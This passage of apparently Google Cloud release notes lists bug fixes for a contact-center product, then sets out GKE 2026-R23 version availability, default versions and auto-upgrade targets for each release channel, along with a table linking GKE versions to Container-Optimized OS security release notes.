&lt;p&gt;This release addresses the following issues:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;Fixed an issue with Salesforce where virtual agent responses appeared out of
order in transcripts.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Fixed an issue where the advanced reporting dashboards didn't load.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Fixed an issue where PDF and audio attachments weren't visible to agents
after a chat transfer.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Fixed an issue where end-users were incorrectly placed on hold following a
cold transfer to a queue.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Fixed an issue where MP3 audio files for agent call deflections couldn't be
uploaded.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Fixed an issue where agents were automatically logged out due to inactivity
while still engaged in active calls or chats.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Fixed an issue where a bulk user upload with blank phone number columns
caused existing direct inbound phone numbers to become unassigned from agent
profiles.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 class="release-note-product-title"&gt;Google Kubernetes Engine&lt;/h2&gt;
&lt;h3&gt;Change&lt;/h3&gt;
&lt;h4 id="2026-r23-version-updates"&gt;(2026-R23) Version updates&lt;/h4&gt;
&lt;p&gt;GKE cluster versions have been updated.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;New versions available for upgrades and new clusters.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;The following versions are now available for new GKE clusters, and for
manual control plane upgrades and node upgrades for existing clusters. For more
information about versioning and upgrades, see &lt;a href="https://cloud.google.com/kubernetes-engine/versioning"&gt;GKE versioning and
support&lt;/a&gt; and &lt;a href="https://cloud.google.com/kubernetes-engine/upgrades"&gt;About GKE
cluster upgrades&lt;/a&gt;.&lt;/p&gt;
&lt;div&gt;

&lt;section&gt;
&lt;h3&gt;Rapid channel&lt;/h3&gt;
&lt;aside class="note"&gt;&lt;strong&gt;Note&lt;/strong&gt;: Your clusters might not have these versions available.
Rollouts are already in progress when we publish the release notes, and can take
multiple days to complete across all Google Cloud zones.&lt;/aside&gt;
&lt;ul&gt;
&lt;li&gt;Version &lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.36.md#v1360"&gt;1.36.0-gke.2684000&lt;/a&gt; is now the default version for cluster creation in the Rapid channel.&lt;/li&gt;
&lt;li&gt;The following versions are now available in the Rapid channel:
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.33.md#v13312"&gt;1.33.12-gke.1166000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.34.md#v1348"&gt;1.34.8-gke.1278000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.35.md#v1355"&gt;1.35.5-gke.1241000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.36.md#v1360"&gt;1.36.0-gke.3009002&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.36.md#v1360"&gt;1.36.0-gke.3070003&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;li&gt;The following versions are no longer available in the Rapid channel:
&lt;ul&gt;
&lt;li&gt;1.33.12-gke.1059000&lt;/li&gt;
&lt;li&gt;1.34.8-gke.1126000&lt;/li&gt;
&lt;li&gt;1.35.5-gke.1057000&lt;/li&gt;
&lt;li&gt;1.36.0-gke.2459000&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;li&gt;Clusters in this channel running the listed minor version have new general auto-upgrade targets. GKE can upgrade control planes and nodes to the following new versions with this release:
&lt;ul&gt;
&lt;li&gt;GKE upgrades clusters to the following new minor versions if there are no factors, such as &lt;a href="https://cloud.google.com/kubernetes-engine/docs/concepts/maintenance-windows-and-exclusions#exclusions"&gt;maintenance exclusions&lt;/a&gt; or deprecated APIs, preventing upgrades:
&lt;ul&gt;
&lt;li&gt;1.32 to &lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.33.md#v13312"&gt;1.33.12-gke.1116000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;1.33 to &lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.34.md#v1348"&gt;1.34.8-gke.1218000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;1.34 to &lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.35.md#v1355"&gt;1.35.5-gke.1163000&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;li&gt;GKE upgrades clusters to the following new patch versions if no minor version upgrade is available, or if the cluster has &lt;a href="https://cloud.google.com/kubernetes-engine/docs/concepts/maintenance-windows-and-exclusions#exclusions"&gt;maintenance exclusions&lt;/a&gt; or other factors preventing minor version upgrades:
&lt;ul&gt;
&lt;li&gt;1.33 to &lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.33.md#v13312"&gt;1.33.12-gke.1116000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;1.34 to &lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.34.md#v1348"&gt;1.34.8-gke.1218000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;1.35 to &lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.35.md#v1355"&gt;1.35.5-gke.1163000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;1.36 to &lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.36.md#v1360"&gt;1.36.0-gke.2684000&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/section&gt;
&lt;section&gt;
&lt;h3&gt;Regular channel&lt;/h3&gt;
&lt;aside class="note"&gt;&lt;strong&gt;Note&lt;/strong&gt;: Your clusters might not have these versions available.
Rollouts are already in progress when we publish the release notes, and can take
multiple days to complete across all Google Cloud zones.&lt;/aside&gt;
&lt;ul&gt;
&lt;li&gt;Version &lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.35.md#v1355"&gt;1.35.5-gke.1000000&lt;/a&gt; is now the default version for cluster creation in the Regular channel.&lt;/li&gt;
&lt;li&gt;The following versions are now available in the Regular channel:
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.33.md#v13312"&gt;1.33.12-gke.1059000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.34.md#v1348"&gt;1.34.8-gke.1126000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.35.md#v1355"&gt;1.35.5-gke.1057000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.36.md#v1360"&gt;1.36.0-gke.2459000&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;li&gt;The following versions are no longer available in the Regular channel:
&lt;ul&gt;
&lt;li&gt;1.33.11-gke.1197000&lt;/li&gt;
&lt;li&gt;1.34.7-gke.1499000&lt;/li&gt;
&lt;li&gt;1.35.3-gke.2190000&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;li&gt;Clusters in this channel running the listed minor version have new general auto-upgrade targets. GKE can upgrade control planes and nodes to the following new versions with this release:
&lt;ul&gt;
&lt;li&gt;GKE upgrades clusters to the following new minor versions if there are no factors, such as &lt;a href="https://cloud.google.com/kubernetes-engine/docs/concepts/maintenance-windows-and-exclusions#exclusions"&gt;maintenance exclusions&lt;/a&gt; or deprecated APIs, preventing upgrades:
&lt;ul&gt;
&lt;li&gt;1.32 to &lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.33.md#v13312"&gt;1.33.12-gke.1000000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;1.33 to &lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.34.md#v1348"&gt;1.34.8-gke.1000000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;1.34 to &lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.35.md#v1355"&gt;1.35.5-gke.1000000&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;li&gt;GKE upgrades clusters to the following new patch versions if no minor version upgrade is available, or if the cluster has &lt;a href="https://cloud.google.com/kubernetes-engine/docs/concepts/maintenance-windows-and-exclusions#exclusions"&gt;maintenance exclusions&lt;/a&gt; or other factors preventing minor version upgrades:
&lt;ul&gt;
&lt;li&gt;1.33 to &lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.33.md#v13312"&gt;1.33.12-gke.1000000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;1.34 to &lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.34.md#v1348"&gt;1.34.8-gke.1000000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;1.35 to &lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.35.md#v1355"&gt;1.35.5-gke.1000000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;1.36 to &lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.36.md#v1360"&gt;1.36.0-gke.2459000&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/section&gt;
&lt;section&gt;
&lt;h3&gt;Stable channel&lt;/h3&gt;
&lt;aside class="note"&gt;&lt;strong&gt;Note&lt;/strong&gt;: Your clusters might not have these versions available.
Rollouts are already in progress when we publish the release notes, and can take
multiple days to complete across all Google Cloud zones.&lt;/aside&gt;
&lt;ul&gt;
&lt;li&gt;The following versions are now available in the Stable channel:
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.33.md#v13311"&gt;1.33.11-gke.1197000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.34.md#v1347"&gt;1.34.7-gke.1499000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.35.md#v1353"&gt;1.35.3-gke.2190000&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;li&gt;Clusters in this channel running the listed minor version have new general auto-upgrade targets. GKE can upgrade control planes and nodes to the following new versions with this release:
&lt;ul&gt;
&lt;li&gt;GKE upgrades clusters to the following new minor versions if there are no factors, such as &lt;a href="https://cloud.google.com/kubernetes-engine/docs/concepts/maintenance-windows-and-exclusions#exclusions"&gt;maintenance exclusions&lt;/a&gt; or deprecated APIs, preventing upgrades:
&lt;ul&gt;
&lt;li&gt;1.33 to &lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.34.md#v1347"&gt;1.34.7-gke.1055000&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/section&gt;
&lt;section&gt;
&lt;h3&gt;Extended channel&lt;/h3&gt;
&lt;aside class="note"&gt;&lt;strong&gt;Note&lt;/strong&gt;: Your clusters might not have these versions available.
Rollouts are already in progress when we publish the release notes, and can take
multiple days to complete across all Google Cloud zones.&lt;/aside&gt;
&lt;ul&gt;
&lt;li&gt;Version &lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.35.md#v1355"&gt;1.35.5-gke.1000000&lt;/a&gt; is now the default version for cluster creation in the Extended channel.&lt;/li&gt;
&lt;li&gt;The following versions are now available in the Extended channel:
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.30.md#v13014"&gt;1.30.14-gke.2558000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.30.md#v13014"&gt;1.30.14-gke.2681000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.31.md#v13114"&gt;1.31.14-gke.1967000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.31.md#v13114"&gt;1.31.14-gke.2074000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.32.md#v13213"&gt;1.32.13-gke.1592000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.32.md#v13213"&gt;1.32.13-gke.1729000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.33.md#v13312"&gt;1.33.12-gke.1059000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.34.md#v1348"&gt;1.34.8-gke.1126000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.35.md#v1355"&gt;1.35.5-gke.1057000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.36.md#v1360"&gt;1.36.0-gke.2459000&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;li&gt;The following versions are no longer available in the Extended channel:
&lt;ul&gt;
&lt;li&gt;1.30.14-gke.2458000 is &lt;a href="https://docs.cloud.google.com/kubernetes-engine/versioning#patch-version-support"&gt;deprecated&lt;/a&gt; in the Extended channel. This version will be removed in 90 days, or at the end of support, if sooner.&lt;/li&gt;
&lt;li&gt;1.30.14-gke.2608000 is &lt;a href="https://docs.cloud.google.com/kubernetes-engine/versioning#patch-version-support"&gt;deprecated&lt;/a&gt; in the Extended channel. This version will be removed in 90 days, or at the end of support, if sooner.&lt;/li&gt;
&lt;li&gt;1.31.14-gke.1868000 is &lt;a href="https://docs.cloud.google.com/kubernetes-engine/versioning#patch-version-support"&gt;deprecated&lt;/a&gt; in the Extended channel. This version will be removed in 90 days, or at the end of support, if sooner.&lt;/li&gt;
&lt;li&gt;1.31.14-gke.1986000 is &lt;a href="https://docs.cloud.google.com/kubernetes-engine/versioning#patch-version-support"&gt;deprecated&lt;/a&gt; in the Extended channel. This version will be removed in 90 days, or at the end of support, if sooner.&lt;/li&gt;
&lt;li&gt;1.32.13-gke.1492000 is &lt;a href="https://docs.cloud.google.com/kubernetes-engine/versioning#patch-version-support"&gt;deprecated&lt;/a&gt; in the Extended channel. This version will be removed in 90 days, or at the end of support, if sooner.&lt;/li&gt;
&lt;li&gt;1.32.13-gke.1657000 is &lt;a href="https://docs.cloud.google.com/kubernetes-engine/versioning#patch-version-support"&gt;deprecated&lt;/a&gt; in the Extended channel. This version will be removed in 90 days, or at the end of support, if sooner.&lt;/li&gt;
&lt;li&gt;1.33.11-gke.1197000&lt;/li&gt;
&lt;li&gt;1.34.7-gke.1499000&lt;/li&gt;
&lt;li&gt;1.35.3-gke.2190000&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;li&gt;Clusters in this channel running the listed minor version have new general auto-upgrade targets. GKE can upgrade control planes and nodes to the following new versions with this release:
&lt;ul&gt;
&lt;li&gt;GKE upgrades clusters to the following new minor versions if there are no factors, such as &lt;a href="https://cloud.google.com/kubernetes-engine/docs/concepts/maintenance-windows-and-exclusions#exclusions"&gt;maintenance exclusions&lt;/a&gt; or deprecated APIs, preventing upgrades:
&lt;ul&gt;
&lt;li&gt;1.29 to &lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.30.md#v13014"&gt;1.30.14-gke.2530000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;1.30 to &lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.31.md#v13114"&gt;1.31.14-gke.1942000&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;li&gt;GKE upgrades clusters to the following new patch versions if no minor version upgrade is available, or if the cluster has &lt;a href="https://cloud.google.com/kubernetes-engine/docs/concepts/maintenance-windows-and-exclusions#exclusions"&gt;maintenance exclusions&lt;/a&gt; or other factors preventing minor version upgrades:
&lt;ul&gt;
&lt;li&gt;1.30 to &lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.30.md#v13014"&gt;1.30.14-gke.2530000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;1.31 to &lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.31.md#v13114"&gt;1.31.14-gke.1942000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;1.32 to &lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.32.md#v13213"&gt;1.32.13-gke.1551000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;1.33 to &lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.33.md#v13312"&gt;1.33.12-gke.1000000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;1.34 to &lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.34.md#v1348"&gt;1.34.8-gke.1000000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;1.35 to &lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.35.md#v1355"&gt;1.35.5-gke.1000000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;1.36 to &lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.36.md#v1360"&gt;1.36.0-gke.2459000&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/section&gt;
&lt;section&gt;
&lt;h3&gt;No channel (deprecated)&lt;/h3&gt;
&lt;aside class="note"&gt;&lt;strong&gt;Note&lt;/strong&gt;: Your clusters might not have these versions available.
Rollouts are already in progress when we publish the release notes, and can take
multiple days to complete across all Google Cloud zones.&lt;/aside&gt;
&lt;ul&gt;
&lt;li&gt;Version &lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.35.md#v1355"&gt;1.35.5-gke.1000000&lt;/a&gt; is now the default version for cluster creation.&lt;/li&gt;
&lt;li&gt;The following versions are now available:
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.33.md#v13312"&gt;1.33.12-gke.1166000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.34.md#v1348"&gt;1.34.8-gke.1278000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.35.md#v1355"&gt;1.35.5-gke.1241000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.36.md#v1360"&gt;1.36.0-gke.2459000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.36.md#v1360"&gt;1.36.0-gke.2684000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.36.md#v1360"&gt;1.36.0-gke.3009002&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.36.md#v1360"&gt;1.36.0-gke.3070003&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;li&gt;The following node versions are now available:
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.30.md#v13014"&gt;1.30.14-gke.2681000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.31.md#v13114"&gt;1.31.14-gke.2074000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.32.md#v13213"&gt;1.32.13-gke.1729000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.33.md#v13312"&gt;1.33.12-gke.1166000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.34.md#v1348"&gt;1.34.8-gke.1278000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.35.md#v1355"&gt;1.35.5-gke.1241000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.36.md#v1360"&gt;1.36.0-gke.2459000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.36.md#v1360"&gt;1.36.0-gke.2684000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.36.md#v1360"&gt;1.36.0-gke.3009002&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.36.md#v1360"&gt;1.36.0-gke.3070003&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;li&gt;Clusters in this channel running the listed minor version have new general auto-upgrade targets. GKE can upgrade control planes and nodes to the following new versions with this release:
&lt;ul&gt;
&lt;li&gt;GKE upgrades clusters to the following new minor versions if there are no factors, such as &lt;a href="https://cloud.google.com/kubernetes-engine/docs/concepts/maintenance-windows-and-exclusions#exclusions"&gt;maintenance exclusions&lt;/a&gt; or deprecated APIs, preventing upgrades:
&lt;ul&gt;
&lt;li&gt;1.32 to &lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.33.md#v13312"&gt;1.33.12-gke.1000000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;1.33 to &lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.34.md#v1347"&gt;1.34.7-gke.1055000&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;li&gt;GKE upgrades clusters to the following new patch versions if no minor version upgrade is available, or if the cluster has &lt;a href="https://cloud.google.com/kubernetes-engine/docs/concepts/maintenance-windows-and-exclusions#exclusions"&gt;maintenance exclusions&lt;/a&gt; or other factors preventing minor version upgrades:
&lt;ul&gt;
&lt;li&gt;1.33 to &lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.33.md#v13312"&gt;1.33.12-gke.1000000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;1.34 to &lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.34.md#v1347"&gt;1.34.7-gke.1055000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;1.35 to &lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.35.md#v1355"&gt;1.35.5-gke.1000000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;1.36 to &lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.36.md#v1360"&gt;1.36.0-gke.2459000&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/section&gt;

&lt;/div&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;h4 id="2026-r23-security-updates"&gt;(2026-R23) Security updates&lt;/h4&gt;
&lt;p&gt;This release includes new GKE versions that use updated
Container-Optimized OS images. These updated images are cumulative,
incorporating security fixes from all Container-Optimized OS
versions released since the previous GKE release.&lt;/p&gt;
&lt;p&gt;To identify the specific vulnerabilities that were resolved in each updated
Container-Optimized OS image, see the &lt;strong&gt;Security&lt;/strong&gt; release notes
for that image. The following table includes links to the release notes for
each updated Container-Optimized OS image:&lt;/p&gt;
&lt;p&gt;
&lt;table&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;th&gt;GKE version&lt;/th&gt;
&lt;th&gt;Container-Optimized OS version&lt;/th&gt;
&lt;th&gt;Details&lt;/th&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;1.30.14-gke.2681000&lt;/td&gt;
&lt;td&gt;cos-117-18613-613-40&lt;/td&gt;
&lt;td&gt;&lt;a href="https://docs.cloud.google.com/container-optimized-os/docs/release-notes/m117#cos-117-18613-613-40_"&gt;cos-117-18613-613-40 release notes&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;1.31.14-gke.2074000&lt;/td&gt;
&lt;td&gt;cos-117-18613-613-40&lt;/td&gt;
&lt;td&gt;&lt;a href="https://docs.cloud.google.com/container-optimized-os/docs/release-notes/m117#cos-117-18613-613-40_"&gt;cos-117-18613-613-40 release notes&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;1.33.12-gke.1166000&lt;/td&gt;
&lt;td&gt;cos-121-18867-381-161&lt;/td&gt;
&lt;td&gt;&lt;a href="https://docs.cloud.google.com/container-optimized-os/docs/release-notes/m121#cos-121-18867-381-161_"&gt;cos-121-18867-381-161 release notes&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;1.35.5-gke.1241000&lt;/td&gt;
&lt;td&gt;cos-125-19216-395-55&lt;/td&gt;
&lt;td&gt;&lt;a href="https://docs.cloud.google.com/container-optimized-os/docs/release-notes/m125#cos-125-19216-395-55_"&gt;cos-125-19216-395-55 release notes&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;1.36.0-gke.2459000&lt;/td&gt;
&lt;td&gt;cos-129-19506-120-64&lt;/td&gt;
&lt;td&gt;&lt;a href="https://docs.cloud.google.com/container-optimized-os/docs/release-notes/m129#cos-129-19506-120-64_"&gt;cos-129-19506-120-64 release notes&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;/p&gt;
&lt;h3&gt;Change&lt;/h3&gt;
&lt;h4 id="2026-r23-version-updates"&gt;(2026-R23) Version updates&lt;/h4&gt;
&lt;aside class="note"&gt;&lt;strong&gt;Note&lt;/strong&gt;: Your clusters might not have these versions available.
Rollouts are already in progress when we publish the release notes, and can take
multiple days to complete across all Google Cloud zones.&lt;/aside&gt;
&lt;ul&gt;
&lt;li&gt;The following versions are now available in the Stable channel:
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.33.md#v13311"&gt;1.33.11-gke.1197000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.34.md#v1347"&gt;1.34.7-gke.1499000&lt;/a&gt;&lt;/li&gt;
